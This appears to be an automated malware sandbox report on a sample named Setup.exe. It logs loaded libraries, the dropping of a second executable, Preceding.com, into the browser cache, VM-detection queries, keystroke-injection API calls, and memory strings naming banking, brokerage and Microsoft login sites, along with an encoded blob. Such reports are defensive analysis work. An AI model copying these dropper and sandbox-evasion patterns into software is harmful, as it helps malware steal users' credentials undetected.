Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Setup.exe

Static file information: File size 1131073 > 1048576

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: Setup.exe

Static PE information: real checksum: 0x11f057 should be: 0x11e3db

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002D0315 push cs; retn 002Ch		13_2_002D0318
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A0DE6 push ecx; ret		13_2_002A0DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_003126DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		13_2_003126DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_0029FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		13_2_0029FC7C

Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

API coverage: 3.9 %

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com TID: 5356

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002EDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_002EDC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002FA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_002FA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002FA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_002FA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002EE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	13_2_002EE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002FA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_002FA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002BC622 FindFirstFileExW,	13_2_002BC622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F66DC FindFirstFileW,FindNextFileW,FindClose,	13_2_002F66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F7333 FindFirstFileW,FindClose,	13_2_002F7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002F73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	13_2_002F73D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002ED921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_002ED921

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_00285FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

13_2_00285FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2675484323.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 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
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674871627.000000000497F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
